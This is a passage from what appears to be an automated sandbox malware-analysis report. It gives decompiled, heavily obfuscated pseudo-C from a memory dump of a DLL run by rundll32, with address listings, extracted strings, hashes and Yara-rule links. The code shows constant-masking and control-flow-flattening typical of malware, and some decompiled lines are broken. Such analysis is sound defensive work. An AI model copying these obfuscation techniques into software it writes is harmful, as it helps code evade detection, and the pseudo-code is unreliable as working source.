				 *(_t425 + 0x24) =  *(_t425 + 0x24) >> 5;
				 *(_t425 + 0x24) =  *(_t425 + 0x24) ^ 0x0005461e;
				 *(_t425 + 0x50) = 0x3b19;
				 *(_t425 + 0x50) =  *(_t425 + 0x50) + 0xab79;
				 *(_t425 + 0x50) =  *(_t425 + 0x50) >> 1;
				 *(_t425 + 0x50) =  *(_t425 + 0x50) ^ 0x00004e0b;
				 *(_t425 + 0x28) = 0xb5f4;
				 *(_t425 + 0x28) =  *(_t425 + 0x28) << 3;
				 *(_t425 + 0x28) =  *(_t425 + 0x28) >> 8;
				 *(_t425 + 0x28) =  *(_t425 + 0x28) ^ 0x00001a96;
				 *(_t425 + 0x84) = 0x2058;
				 *(_t425 + 0x84) =  *(_t425 + 0x84) ^ 0x3bbb461a;
				 *(_t425 + 0x84) =  *(_t425 + 0x84) ^ 0x3bbb4910;
				 *(_t425 + 0x40) = 0xaf64;
				_t410 = 0x7d;
				 *(_t425 + 0x44) =  *(_t425 + 0x40) / _t410;
				_t411 = 0xc;
				 *(_t425 + 0x44) =  *(_t425 + 0x44) / _t411;
				 *(_t425 + 0x44) =  *(_t425 + 0x44) ^ 0x00000f3f;
				 *(_t425 + 0x80) = 0x32f4;
				 *(_t425 + 0x80) =  *(_t425 + 0x80) + 0xe885;
				 *(_t425 + 0x80) =  *(_t425 + 0x80) ^ 0x00011771;
				 *(_t425 + 0x78) = 0x4c70;
				 *(_t425 + 0x78) =  *(_t425 + 0x78) + 0xffff5c2b;
				 *(_t425 + 0x78) =  *(_t425 + 0x78) ^ 0xffff951c;
				 *(_t425 + 0x74) = 0x3a5b;
				 *(_t425 + 0x74) =  *(_t425 + 0x74) ^ 0xbca56569;
				 *(_t425 + 0x74) =  *(_t425 + 0x74) ^ 0xbca515a3;
				 *(_t425 + 0x48) = 0x8384;
				 *(_t425 + 0x48) =  *(_t425 + 0x48) >> 2;
				 *(_t425 + 0x48) =  *(_t425 + 0x48) | 0x10d7309d;
				 *(_t425 + 0x48) =  *(_t425 + 0x48) ^ 0x10d75c04;
				 *(_t425 + 0x58) = 0xbd27;
				_t412 = 0x72;
				 *(_t425 + 0x9c) =  *(_t425 + 0x9c) & 0x00000000;
				 *(_t425 + 0x54) =  *(_t425 + 0x58) / _t412;
				 *(_t425 + 0x54) =  *(_t425 + 0x54) >> 1;
				 *(_t425 + 0x54) =  *(_t425 + 0x54) ^ 0x00005bce;
				 *(_t425 + 0x10) = 0x2e5b;
				 *(_t425 + 0x10) =  *(_t425 + 0x10) ^ 0x3d4b089a;
				 *(_t425 + 0x10) =  *(_t425 + 0x10) * 0x1e;
				 *(_t425 + 0x10) =  *(_t425 + 0x10) >> 9;
				 *(_t425 + 0x10) =  *(_t425 + 0x10) ^ 0x00174e58;
				 *(_t425 + 0x3c) = 0x4cc5;
				 *(_t425 + 0x3c) =  *(_t425 + 0x3c) << 0x10;
				 *(_t425 + 0x3c) =  *(_t425 + 0x3c) + 0x213f;
				 *(_t425 + 0x3c) =  *(_t425 + 0x3c) ^ 0x4cc520be;
				 *(_t425 + 0x8c) = 0x129;
				 *(_t425 + 0x8c) =  *(_t425 + 0x8c) << 5;
				 *(_t425 + 0x8c) =  *(_t425 + 0x8c) ^ 0x00003b7f;
				 *(_t425 + 0x78) = 0xd5fe;
				 *(_t425 + 0x78) =  *(_t425 + 0x78) | 0x02f940af;
				 *(_t425 + 0x78) =  *(_t425 + 0x78) ^ 0x02f9d8a0;
				 *(_t425 + 0x5c) = 0xd8da;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) >> 1;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) | 0xc5009f59;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) ^ 0xc500d6b3;
				 *(_t425 + 0x90) = 0x6abb;
				 *(_t425 + 0x90) =  *(_t425 + 0x90) << 4;
				 *(_t425 + 0x90) =  *(_t425 + 0x90) ^ 0x0006aaad;
				 *(_t425 + 0x68) = 0x5f3b;
				_t413 = 0x48;
				 *(_t425 + 0x6c) =  *(_t425 + 0x68) / _t413;
				 *(_t425 + 0x6c) =  *(_t425 + 0x6c) + 0x8faa;
				 *(_t425 + 0x6c) =  *(_t425 + 0x6c) ^ 0x0000e29f;
				 *(_t425 + 0x34) = 0xc3b8;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) << 2;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) + 0x1452;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) ^ 0x00037c1e;
				 *(_t425 + 0x70) = 0x913d;
				 *(_t425 + 0x70) =  *(_t425 + 0x70) + 0x23a0;
				 *(_t425 + 0x70) =  *(_t425 + 0x70) ^ 0x00009c2e;
				 *(_t425 + 0x98) = 0xc0a5;
				_t414 = 0x2c;
				 *(_t425 + 0x98) =  *(_t425 + 0x98) / _t414;
				 *(_t425 + 0x98) =  *(_t425 + 0x98) ^ 0x00000e21;
				 *(_t425 + 0x24) = 0x9c9f;
				 *(_t425 + 0x24) =  *(_t425 + 0x24) | 0xe4843219;
				_t415 = 0x4b;
				 *(_t425 + 0x20) =  *(_t425 + 0x24) * 0x67;
				 *(_t425 + 0x20) =  *(_t425 + 0x20) | 0xb0031e1b;
				 *(_t425 + 0x20) =  *(_t425 + 0x20) ^ 0xf16bb75e;
				 *(_t425 + 0x80) = 0x59bd;
				 *(_t425 + 0x80) =  *(_t425 + 0x80) >> 6;
				 *(_t425 + 0x80) =  *(_t425 + 0x80) ^ 0x0000494b;
				 *(_t425 + 0x18) = 0xc90e;
				 *(_t425 + 0x18) =  *(_t425 + 0x18) + 0x1e67;
				 *(_t425 + 0x18) =  *(_t425 + 0x18) / _t415;
				 *(_t425 + 0x18) =  *(_t425 + 0x18) + 0x529e;
				 *(_t425 + 0x18) =  *(_t425 + 0x18) ^ 0x00003516;
				 *(_t425 + 0x34) = 0x88fc;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) * 0xf;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) + 0xffff4f5a;
				 *(_t425 + 0x34) =  *(_t425 + 0x34) ^ 0x00073154;
				 *(_t425 + 0x1c) = 0x8e01;
				 *(_t425 + 0x1c) =  *(_t425 + 0x1c) * 0x26;
				 *(_t425 + 0x1c) =  *(_t425 + 0x1c) + 0x44f;
				 *(_t425 + 0x1c) =  *(_t425 + 0x1c) + 0x2e92;
				 *(_t425 + 0x1c) =  *(_t425 + 0x1c) ^ 0x00152016;
				 *(_t425 + 0x4c) = 0x6c95;
				 *(_t425 + 0x4c) =  *(_t425 + 0x4c) * 0x6f;
				 *(_t425 + 0x4c) =  *(_t425 + 0x4c) | 0x84af6e97;
				 *(_t425 + 0x4c) =  *(_t425 + 0x4c) ^ 0x84af41ab;
				 *(_t425 + 0x14) = 0x9196;
				 *(_t425 + 0x14) =  *(_t425 + 0x14) | 0xcea5eafd;
				 *(_t425 + 0x14) =  *(_t425 + 0x14) + 0xffff24e0;
				 *(_t425 + 0x14) =  *(_t425 + 0x14) ^ 0x8476cfdc;
				 *(_t425 + 0x14) =  *(_t425 + 0x14) ^ 0x4ad3dd1e;
				 *(_t425 + 0x2c) = 0xd34e;
				 *(_t425 + 0x2c) =  *(_t425 + 0x2c) ^ 0x57c08399;
				 *(_t425 + 0x2c) =  *(_t425 + 0x2c) * 0x38;
				 *(_t425 + 0x2c) =  *(_t425 + 0x2c) ^ 0x32118ce7;
				 *(_t425 + 0x60) = 0xe8cb;
				_t416 = 0x60;
				 *(_t425 + 0x64) =  *(_t425 + 0x60) / _t416;
				 *(_t425 + 0x64) =  *(_t425 + 0x64) >> 5;
				 *(_t425 + 0x64) =  *(_t425 + 0x64) ^ 0x0000207e;
				 *(_t425 + 0x5c) = 0xced7;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) ^ 0x4599501d;
				_t417 = 0xb;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) / _t417;
				 *(_t425 + 0x5c) =  *(_t425 + 0x5c) ^ 0x0653be73;
				 *(_t425 + 0x8c) = 0x3004;
				_t418 = 0x46;
				_t364 =  *(_t425 + 0x98);
				_t419 = 0x2d70ba52;
				_t407 =  *(_t425 + 0x98);
				_t423 =  *(_t425 + 0x98);
				 *(_t425 + 0x88) =  *(_t425 + 0x8c) / _t418;
				 *(_t425 + 0x88) =  *(_t425 + 0x88) ^ 0x000000ac;
				while(_t366 != 0x5902d7e) {
					if(_t366 == 0xe3557bd) {
						_push(_t366);
						E1001B82F(_t425 + 0xac,  *(_t425 + 0x40), __eflags,  *(_t425 + 0x28));
						_t343 = E100040A7( *(_t425 + 0x64), _t425 + 0xb0,  *(_t425 + 0x38),  *(_t425 + 0x90),  *(_t425 + 0x48));
						_t423 = _t343;
						_t425 = _t425 + 0x14;
						_t366 = 0x1c9545e3;
						 *((short*)(_t343 - 2)) = 0;
						continue;
					}
					if(_t366 == 0x15fc28ad) {
						_t403 =  *(_t425 + 0x28);
						E100033F4( *(_t425 + 0x40),  *(_t425 + 0x28),  *(_t425 + 0x54),  *(_t425 + 0x18), _t407);
						_t425 = _t425 + 0xc;
						_t366 = 0x25ba7fa9;
						continue;
					}
					if(_t366 == 0x1c9545e3) {
						_t403 =  *(_t425 + 0x9c);
						_t349 = E100139A2( *((intOrPtr*)(_t425 + 0xa4)),  *(_t425 + 0x9c),  *(_t425 + 0x8c) | 0x00000006,  *((intOrPtr*)(_t425 + 0x94)), 0x2000000, 1,  *((intOrPtr*)(_t425 + 0xa0)), _t366,  *(_t425 + 0x54),  *(_t425 + 0x60), _t366, _t425 + 0xa8,  *(_t425 + 0x10));
						_t364 = _t349;
						_t425 = _t425 + 0x2c;
						__eflags = _t349 - 0xffffffff;
						if(__eflags == 0) {
							L30:
							__eflags = 0;
							return 0;
						}
						_t366 = 0x27ba6e70;
						continue;
					}
					if(_t366 == 0x25ba7fa9) {
						E1000ADFC( *((intOrPtr*)(_t425 + 0x30)),  *(_t425 + 0x64), _t364,  *(_t425 + 0x58));
						goto L30;
					}
					if(_t366 == 0x27ba6e70) {
						_push(_t366);
						 *(_t425 + 0x9c) = 0x1000;
						_t407 = E1000A0AD(0x1000, _t403);
						__eflags = _t407;
						_t366 =  !=  ? _t419 : 0x25ba7fa9;
						continue;
					}
					if(_t366 != _t419) {
						L27:
						__eflags = _t366 - 0xfdd433c;
						if(__eflags != 0) {
							continue;
						}
						goto L30;
					}
					_t403 =  *(_t425 + 0x8c);
					_t356 = E100067DF( *((intOrPtr*)(_t425 + 0xa8)),  *(_t425 + 0x8c),  *((intOrPtr*)(_t425 + 0xbc)), _t425 + 0xa4, _t366, _t407,  *(_t425 + 0x84),  *(_t425 + 0x48), _t366,  *((intOrPtr*)(_t425 + 0x7c)), _t366, _t364,  *(_t425 + 0x4c),  *(_t425 + 0x98));
					_t425 = _t425 + 0x30;
					if(_t356 == 0) {
						_t357 =  *(_t425 + 0x9c);
						L18:
						__eflags = _t357;
						if(__eflags == 0) {
							_t366 = _t419;
						} else {
							_t405 =  *0x10021400; // 0x0
							_t403 =  *(_t405 + 0x24);
							E10001854( *(_t425 + 0x84),  *(_t405 + 0x24),  *(_t425 + 0x18));
							_t366 = 0x15fc28ad;
						}
						continue;
					}
					_t421 = _t407;
					L10:
					while(1) {
						if( *((intOrPtr*)(_t421 + 4)) != 4) {
							L12:
							_t359 =  *_t421;
							if(_t359 == 0) {
								_t357 =  *(_t425 + 0x9c);
								L17:
								_t419 = 0x2d70ba52;
								goto L18;
							}
							_t421 = _t421 + _t359;
							continue;
						}
						_t403 =  *(_t425 + 0x20);
						_t281 = _t421 + 0xc; // 0xe2d
						if(E10001B9D( *((intOrPtr*)(_t425 + 0x94)),  *(_t425 + 0x20), _t281, _t423) == 0) {
							_t357 = 1;
							 *(_t425 + 0x9c) = 1;
							goto L17;
						}
						goto L12;
					}
				}
				_t366 = 0xe3557bd;
				goto L27;
			}

0x10013f1c
0x10013f26
0x10013f2e
0x10013f33
0x10013f3b
0x10013f43
0x10013f4b
0x10013f53
0x10013f5b
0x10013f63
0x10013f6b
0x10013f79
0x10013f7d
0x10013f85
0x10013f8d
0x10013f95
0x10013f9a
0x10013f9f
0x10013fa7
0x10013faf
0x10013fb7
0x10013fbb
0x10013fc3
0x10013fcb
0x10013fd0
0x10013fd5
0x10013fdd
0x10013fe8
0x10013ff3
0x10013ffe
0x1001400c
0x10014011
0x1001401b
0x10014020
0x10014026
0x1001402e
0x10014039
0x10014044
0x1001404f
0x10014057
0x1001405f
0x10014067
0x1001406f
0x10014077
0x1001407f
0x10014087
0x1001408c
0x10014094
0x1001409c
0x100140a8
0x100140ab
0x100140b3
0x100140b7
0x100140bb
0x100140c3
0x100140cb
0x100140d8
0x100140dc
0x100140e1
0x100140e9
0x100140f1
0x100140f6
0x100140fe
0x10014106
0x10014113
0x1001411b
0x10014126
0x1001412e
0x10014136
0x1001413e
0x10014146
0x1001414a
0x10014152
0x1001415a
0x10014165
0x1001416d
0x10014178
0x10014186
0x1001418b
0x10014191
0x10014199
0x100141a1
0x100141a9
0x100141ae
0x100141b6
0x100141be
0x100141c6
0x100141ce
0x100141d6
0x100141e8
0x100141ed
0x100141f6
0x10014201
0x10014209
0x10014216
0x10014217
0x1001421b
0x10014223
0x1001422b
0x10014236
0x1001423e
0x10014249
0x10014251
0x1001425f
0x10014263
0x1001426b
0x10014273
0x10014280
0x10014284
0x1001428c
0x10014294
0x100142a1
0x100142a5
0x100142ad
0x100142b5
0x100142bd
0x100142ca
0x100142ce
0x100142d6
0x100142de
0x100142e6
0x100142ee
0x100142f6
0x100142fe
0x10014306
0x1001430e
0x1001431b
0x1001431f
0x10014329
0x10014337
0x1001433c
0x10014342
0x10014347
0x1001434f
0x10014357
0x10014363
0x10014368
0x1001436e
0x10014376
0x10014388
0x1001438b
0x10014392
0x10014397
0x1001439e
0x100143a5
0x100143ac
0x100143b7
0x100143c9
0x10014583
0x10014593
0x100145b2
0x100145b7
0x100145b9
0x100145be
0x100145c3
0x00000000
0x100145c3
0x100143d5
0x10014569
0x10014571
0x10014576
0x10014579
0x00000000
0x10014579
0x100143e1
0x10014531
0x10014543
0x10014548
0x1001454a
0x1001454d
0x10014550
0x100145f3
0x100145f6
0x100145ff
0x100145ff
0x10014556
0x00000000
0x10014556
0x100143ed
0x100145ec
0x00000000
0x100145f2
0x100143f9
0x100144d7
0x100144dd
0x100144ed
0x100144f0
0x100144f7
0x00000000
0x100144f7
0x10014401
0x100145d1
0x100145d1
0x100145d7
0x00000000
0x00000000
0x00000000
0x100145dd
0x10014435
0x10014443
0x10014448
0x1001444d
0x10014488
0x1001449d
0x1001449d
0x1001449f
0x100144c5
0x100144a1
0x100144a5
0x100144b2
0x100144b5
0x100144bb
0x100144bb
0x00000000
0x1001449f
0x1001444f
0x00000000
0x10014451
0x10014455
0x10014472
0x10014472
0x10014476
0x10014491
0x10014498
0x10014498
0x00000000
0x10014498
0x10014478
0x00000000
0x10014478
0x10014457
0x1001445b
0x10014470
0x1001447e
0x1001447f
0x00000000
0x1001447f
0x00000000
0x10014470
0x10014451
0x100145cc
0x00000000

Strings

+<, xrefs: 10013F85
Ic, xrefs: 10013F43
~ , xrefs: 10014347
[., xrefs: 100140C3
KI, xrefs: 1001423E
X , xrefs: 10013FDD
;_, xrefs: 10014178
[:, xrefs: 10014067
pL, xrefs: 1001404F
?!, xrefs: 100140F6

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +<$;_$?!$Ic$KI$X $[.$[:$pL$~
API String ID: 0-1893785045
Opcode ID: 63eb2d764f4964d3ded7fb4ef5bcc5c62e72bddcb2d15356c7cbcf945a55fe1f
Instruction ID: c1ae48b588552c2841699fd27ad0feda69bd6ec10a6177a85b81a8be4340fd47
Opcode Fuzzy Hash: 63eb2d764f4964d3ded7fb4ef5bcc5c62e72bddcb2d15356c7cbcf945a55fe1f
Instruction Fuzzy Hash: 11F134715083819FE368CF21C589A4BBBE1FBC4758F10891CF5DA8A2A0DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002814, Relevance: 12.7, Strings: 10, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10002814(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _t189;
				signed int _t191;
				signed int _t196;
				signed int _t205;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				intOrPtr _t213;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				void* _t229;
				intOrPtr _t230;
				signed int _t231;
				signed int _t232;
				signed int* _t233;

				_t206 = __ecx;
				_t233 =  &_v116;
				_v12 = 0x2a0557;
				_v4 = 0;
				_v8 = 0x6c6de6;
				_v112 = 0x2a69;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 >> 8;
				_v112 = _v112 << 0xd;
				_v112 = _v112 ^ 0x00004880;
				_v116 = 0xb323;
				_v116 = _v116 << 8;
				_v36 = 0;
				_t229 = 0x1ff36b6d;
				_v20 = __edx;
				_t225 = 0x65;
				_v32 = __ecx;
				_v116 = _v116 / _t225;
				_v116 = _v116 ^ 0x93abb644;
				_v116 = _v116 ^ 0x93aa6dc2;
				_v108 = 0x880d;
				_v108 = _v108 + 0xffff35dd;
				_v108 = _v108 + 0xffffe4fc;
				_v108 = _v108 ^ 0x009e631a;
				_v108 = _v108 ^ 0xff61e0ad;
				_v88 = 0x31;
				_v88 = _v88 | 0x1fd0e8a9;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x0fe85393;
				_v68 = 0x4867;
				_v68 = _v68 * 0x6f;
				_v68 = _v68 ^ 0x001f44f6;
				_v72 = 0x811b;
				_v72 = _v72 >> 9;
				_v72 = _v72 ^ 0x00006a51;
				_v104 = 0x4058;
				_v104 = _v104 << 0xa;
				_v104 = _v104 ^ 0x3d67f590;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x6695e62f;
				_v84 = 0x31f6;
				_v84 = _v84 + 0x4ff0;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000404a9;
				_v60 = 0xb121;
				_v60 = _v60 + 0xffff7554;
				_v60 = _v60 ^ 0x00001f3d;
				_v64 = 0x7d52;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00001f1b;
				_v52 = 0xa1bb;
				_v52 = _v52 * 0x73;
				_v52 = _v52 ^ 0x0048ff94;
				_v76 = 0x2ec9;
				_v76 = _v76 + 0xffff3887;
				_v76 = _v76 + 0xffffbfec;
				_v76 = _v76 ^ 0xffff3ebe;
				_v80 = 0x6bdf;
				_v80 = _v80 ^ 0xc6cd2da4;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0x3519b831;
				_v56 = 0xc049;
				_v56 = _v56 | 0x22887e3f;
				_v56 = _v56 ^ 0x2288bc25;
				_v44 = 0xdc12;
				_v44 = _v44 | 0xafd989ec;
				_v44 = _v44 ^ 0xafd9fffd;
				_v48 = 0x82eb;
				_v48 = _v48 + 0xffff9047;
				_v48 = _v48 ^ 0x0000384e;
				_v96 = 0xa654;
				_v96 = _v96 * 0x2c;
				_t226 = 0x45;
				_t205 = _v20;
				_t232 = _v20;
				_v96 = _v96 * 0x4f;
				_v96 = _v96 | 0x2accabbc;
				_v96 = _v96 ^ 0x2ade8c64;
				_v100 = 0xa893;
				_v100 = _v100 ^ 0x9ed8e51e;
				_v100 = _v100 ^ 0xb8742b58;
				_t189 = _v100;
				_t221 = _t189 % _t226;
				_t227 = _v16;
				_v100 = _t189 / _t226;
				_v100 = _v100 ^ 0x008f1267;
				_t191 = _v40;
				_v92 = 0xce76;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x60bbed14;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 ^ 0x000305df;
				while(_t229 != 0x1ff36b6d) {
					if(_t229 == 0x2e76c5a0) {
						_t221 = _t191;
						_t208 = E100160D4(_v108, _t191, _v88, _t206,  &_v28, _v68, _t232, _v72);
						_t233 =  &(_t233[6]);
						_v36 = _t208;
						if(_t208 == 0) {
							_t230 = _v36;
							goto L19;
						} else {
							_t210 = _v28;
							if(_t210 == 0) {
								goto L15;
							} else {
								_t191 = _v40 + _t210;
								_v40 = _t191;
								_t232 = _t232 - _t210;
								if(_t232 != 0) {
									goto L6;
								} else {
									_t213 = _t227 + _t227;
									_push(_t213);
									_v24 = _t213;
									_t231 = E1000A0AD(_t213, _t221);
									if(_t231 == 0) {
										goto L15;
									} else {
										E1000E2FD(_t231, _v60, _t227, _v64, _t205);
										_t221 = _v76;
										E100033F4(_v52, _v76, _v80, _v56, _t205);
										_t232 = _t227;
										_t191 = _t231 + _t227;
										_t227 = _v24;
										_t233 =  &(_t233[6]);
										_v40 = _t191;
										_t205 = _t231;
										if(_t232 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t229 != 0x3a767031) {
							L14:
							if(_t229 != 0x1830825d) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t227 = 0x10000;
							_push(_t206);
							_t191 = E1000A0AD(0x10000, _t221);
							_t205 = _t191;
							if(_t205 == 0) {
								L15:
								_t230 = _v36;
								if(_t230 == 0) {
									L19:
									E100033F4(_v44, _v48, _v96, _v100, _t205);
								} else {
									_t196 = _v20;
									 *_t196 = _t205;
									 *((intOrPtr*)(_t196 + 4)) = _t227 - _t232;
								}
							} else {
								_v40 = _t191;
								_t232 = 0x10000;
								L6:
								_t206 = _v32;
								_t229 = 0x2e76c5a0;
								continue;
							}
						}
					}
					return _t230;
				}
				_t229 = 0x3a767031;
				goto L14;
			}

0x10002814
0x10002814
0x10002817
0x10002821
0x10002825
0x1000282d
0x10002835
0x1000283a
0x1000283f
0x10002844
0x1000284c
0x10002853
0x1000285b
0x1000285f
0x10002868
0x10002870
0x10002873
0x10002877
0x1000287b
0x10002883
0x1000288b
0x10002893
0x1000289b
0x100028a3
0x100028ab
0x100028b3
0x100028bb
0x100028c3
0x100028c7
0x100028cf
0x100028dc
0x100028e0
0x100028e8
0x100028f0
0x100028f5
0x100028fd
0x10002905
0x1000290a
0x10002912
0x10002917
0x1000291f
0x10002927
0x1000292f
0x10002934
0x1000293c
0x10002944
0x1000294c
0x10002954
0x1000295c
0x10002961
0x10002969
0x10002976
0x1000297a
0x10002982
0x1000298a
0x10002992
0x1000299a
0x100029a2
0x100029aa
0x100029b2
0x100029b7
0x100029bf
0x100029c7
0x100029cf
0x100029d7
0x100029df
0x100029e7
0x100029ef
0x100029f7
0x100029ff
0x10002a07
0x10002a14
0x10002a21
0x10002a22
0x10002a26
0x10002a2a
0x10002a2e
0x10002a36
0x10002a3e
0x10002a46
0x10002a4e
0x10002a56
0x10002a5a
0x10002a5c
0x10002a60
0x10002a64
0x10002a6c
0x10002a70
0x10002a78
0x10002a7d
0x10002a85
0x10002a8a
0x10002a92
0x10002aa4
0x10002afa
0x10002b01
0x10002b03
0x10002b06
0x10002b0c
0x10002bbb
0x00000000
0x10002b12
0x10002b12
0x10002b18
0x00000000
0x10002b1e
0x10002b22
0x10002b24
0x10002b28
0x10002b2a
0x00000000
0x10002b2c
0x10002b30
0x10002b37
0x10002b38
0x10002b41
0x10002b46
0x00000000
0x10002b48
0x10002b54
0x10002b62
0x10002b6a
0x10002b6f
0x10002b71
0x10002b74
0x10002b7b
0x10002b7e
0x10002b82
0x10002b86
0x00000000
0x10002b88
0x00000000
0x10002b88
0x10002b86
0x10002b46
0x10002b2a
0x10002b18
0x10002aa6
0x10002aac
0x10002b92
0x10002b98
0x00000000
0x00000000
0x00000000
0x00000000
0x10002ab2
0x10002ab6
0x10002abf
0x10002ac2
0x10002ac7
0x10002acc
0x10002b9e
0x10002b9e
0x10002ba4
0x10002bbf
0x10002bd0
0x10002ba6
0x10002ba6
0x10002bac
0x10002bae
0x10002bae
0x10002ad2
0x10002ad2
0x10002ad6
0x10002ad8
0x10002ad8
0x10002adc
0x00000000
0x10002adc
0x10002acc
0x10002aac
0x10002bba
0x10002bba
0x10002b8d
0x00000000

Strings

1, xrefs: 100028B3
i*, xrefs: 1000282D
1pv:, xrefs: 10002B8D
X@, xrefs: 100028FD
gH, xrefs: 100028CF
N8, xrefs: 100029FF
ml, xrefs: 10002825
Qj, xrefs: 100028F5
R}, xrefs: 10002954
1pv:, xrefs: 10002AA6

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$1pv:$1pv:$N8$Qj$R}$X@$gH$i*$ml
API String ID: 0-2748510710
Opcode ID: 71160ac7658b3973f75ae2cc60728a7941a981c0bb2ad8ddb5d14b7525e3a8a6
Instruction ID: 5b5f242eb1bd5edcd4930806915aaa5eb508f097150345b96fc687b37d276cde
Opcode Fuzzy Hash: 71160ac7658b3973f75ae2cc60728a7941a981c0bb2ad8ddb5d14b7525e3a8a6
Instruction Fuzzy Hash: 70A12B715083818FD358CF69C48941BFBE0FBC5B88F508A1DF99696224D7B8D949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10007306, Relevance: 11.5, Strings: 9, Instructions: 277
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10007306(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t295;
				void* _t300;
				void* _t301;
				void* _t306;
				void* _t308;
				void* _t315;
				void* _t320;
				void* _t321;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t348;
				void* _t349;
				signed int* _t351;
				void* _t359;

				_t351 =  &_v128;
				_v24 = 0x92cd;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x000035ad;
				_v76 = 0x2216;
				_v76 = _v76 ^ 0x0d4c0ab5;
				_t321 = __ecx;
				_t348 = 0;
				_t323 = 0x75;
				_v76 = _v76 / _t323;
				_v76 = _v76 ^ 0x001d645f;
				_t349 = 0xf00eebf;
				_v28 = 0x1888;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00002ffb;
				_v32 = 0x4dbc;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0x00006207;
				_v88 = 0x6994;
				_v88 = _v88 >> 0xa;
				_t324 = 0x4e;
				_v88 = _v88 / _t324;
				_v88 = _v88 | 0xce1b3056;
				_v88 = _v88 ^ 0xce1b4667;
				_v92 = 0x5a1c;
				_v92 = _v92 << 0xc;
				_v92 = _v92 + 0xffff2f69;
				_v92 = _v92 + 0xffff421e;
				_v92 = _v92 ^ 0x05a05534;
				_v68 = 0x4de5;
				_v68 = _v68 ^ 0x22a9b817;
				_v68 = _v68 + 0xffff3c42;
				_v68 = _v68 ^ 0x22a92f1f;
				_v96 = 0x6e97;
				_v96 = _v96 + 0xffff57e9;
				_v96 = _v96 + 0xffff9815;
				_v96 = _v96 | 0x300b2be0;
				_v96 = _v96 ^ 0xffff0b41;
				_v36 = 0x8ae8;
				_v36 = _v36 + 0xffffc7de;
				_v36 = _v36 ^ 0x00003a8a;
				_v104 = 0xdf03;
				_v104 = _v104 ^ 0xfca9f681;
				_v104 = _v104 | 0xc96bfc57;
				_v104 = _v104 + 0xef4c;
				_v104 = _v104 ^ 0xfdecdfc4;
				_v40 = 0x5c15;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x00002a9c;
				_v108 = 0xb79b;
				_v108 = _v108 ^ 0x3895c6c0;
				_v108 = _v108 * 0x6d;
				_v108 = _v108 ^ 0x97244dd4;
				_v108 = _v108 ^ 0x80851155;
				_v112 = 0x5b21;
				_v112 = _v112 >> 0x10;
				_v112 = _v112 * 0x7d;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 ^ 0x0000339e;
				_v80 = 0x5f09;
				_v80 = _v80 + 0xe83e;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0x0a3a755e;
				_v44 = 0xdc5e;
				_v44 = _v44 ^ 0xd0d8ba31;
				_v44 = _v44 ^ 0xd0d853cc;
				_v116 = 0x77f1;
				_v116 = _v116 | 0x940fdf26;
				_v116 = _v116 << 2;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x001415d7;
				_v100 = 0xdae6;
